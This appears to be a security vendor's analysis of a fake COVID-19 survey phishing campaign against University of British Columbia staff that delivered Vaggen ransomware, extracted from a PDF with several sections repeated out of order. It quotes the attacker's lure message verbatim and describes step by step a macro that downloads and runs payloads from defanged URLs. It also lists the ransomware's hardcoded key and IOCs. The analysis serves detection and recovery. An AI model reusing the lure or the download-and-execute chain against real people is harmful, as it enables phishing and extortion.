the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3159 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3160 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3161 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3162 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3163 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3164 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3165 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3166 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3167 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3168 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3169 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3170 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3171 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3172 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3173 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3174 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3175 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3176 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3177 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims into paying to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than sending the fake survey directly via email, the attacker uploaded the document to Box and DropBox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam sent through file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute killar.exe
Checks the return value of the Shell function to see whether the launch succeeded (on success, the return value is the task ID of the executed application)
If successful, it sends a GET HTTP request to:
canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it isn’t successful, it sends a GET HTTP request to:
canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted on a particular event. This can be very useful as an early warning system that an intruder has gained access to a network. In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA and main_SPRINGA. Some of them could be mapped to their actual roles:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is implemented as the callback of the standard Go function filepath.Walk (from the path/filepath package).

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption routine is similar to the one demonstrated here: it uses the hardcoded key and a 12-byte nonce generated by CryptGenRandom, and the file content is encrypted with the gcm.Seal function.

The content of the output file (with the .VAGGEN extension) consists of:

the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low and, unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia. This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Variant1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
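As an added example of the recovery the write-up describes (this is not code from the Malwarebytes post, nor from the malware), the Go program below treats a .VAGGEN file body as nonce || ciphertext || tag, opens it with AES-256-GCM under the hardcoded 32-byte key, and shows how GCM’s tag check makes a wrong key, a truncated file or a flipped byte fail closed. The sample blob is constructed in memory with Go’s own crypto/cipher so the program runs offline; the function names SplitVaggen, DecryptVaggen and SealSample are this example’s own and have nothing to do with the malware’s obfuscated function names.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

// VaggenKey is the 32-byte key the write-up reports as hardcoded in the
// binary; a 32-byte key selects AES-256 in crypto/aes.
const VaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const (
	nonceSize = 12 // standard GCM nonce; the malware drew one per file from CryptGenRandom
	tagSize   = 16 // GCM authentication tag that gcm.Seal appends to the ciphertext
)

// SplitVaggen separates the three fields of a .VAGGEN file body
// (nonce || ciphertext || tag) without decrypting anything. Because the key
// is shared by every file, the leading 12 bytes are the only per-file value
// a recovery tool has to read; the tag is always the trailing 16 bytes.
func SplitVaggen(blob []byte) (nonce, ciphertext, tag []byte, err error) {
	if len(blob) < nonceSize+tagSize {
		return nil, nil, nil, errors.New("file too short to hold a nonce and a GCM tag")
	}
	return blob[:nonceSize], blob[nonceSize : len(blob)-tagSize], blob[len(blob)-tagSize:], nil
}

// DecryptVaggen recovers the plaintext of one .VAGGEN file body under key.
// gcm.Open verifies the tag before returning anything, so a wrong key, a
// truncated file or a corrupted byte yields an error rather than garbage.
func DecryptVaggen(blob, key []byte) ([]byte, error) {
	if len(key) != 32 {
		return nil, fmt.Errorf("expected a 32-byte AES-256 key, got %d bytes", len(key))
	}
	nonce, _, _, err := SplitVaggen(blob)
	if err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block) // 12-byte nonce, 16-byte tag by default
	if err != nil {
		return nil, err
	}
	// Open expects ciphertext||tag, which is exactly what follows the nonce.
	return gcm.Open(nil, nonce, blob[nonceSize:], nil)
}

// SealSample builds a constructed test blob in the same nonce||ciphertext||tag
// layout with Go's own GCM and a fresh random nonce. It exists only so the
// decryptor can be exercised offline; it is not the malware's code.
func SealSample(plaintext, key []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	// Seal appends ciphertext||tag to dst; passing nonce as dst yields the file layout.
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

func main() {
	key := []byte(VaggenKey)
	// Constructed sample standing in for the body of one .VAGGEN file.
	blob, err := SealSample([]byte("constructed sample: quarterly-report contents"), key)
	if err != nil {
		panic(err)
	}
	nonce, ct, tag, _ := SplitVaggen(blob)
	fmt.Printf("nonce=%x ciphertext=%d bytes tag=%x\n", nonce, len(ct), tag)
	pt, err := DecryptVaggen(blob, key)
	if err != nil {
		panic(err)
	}
	fmt.Printf("recovered: %q\n", pt)
	// A wrong key fails closed instead of producing a bogus output file.
	if _, err := DecryptVaggen(blob, []byte("0123456789abcdef0123456789abcdef")); err != nil {
		fmt.Println("wrong key rejected:", err)
	}
}
```

A recovery tool built on this should write the decrypted output only when DecryptVaggen returns without error, and should read the nonce from each file individually rather than assuming it is shared: the key is constant across the victim’s files, the nonce is not.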
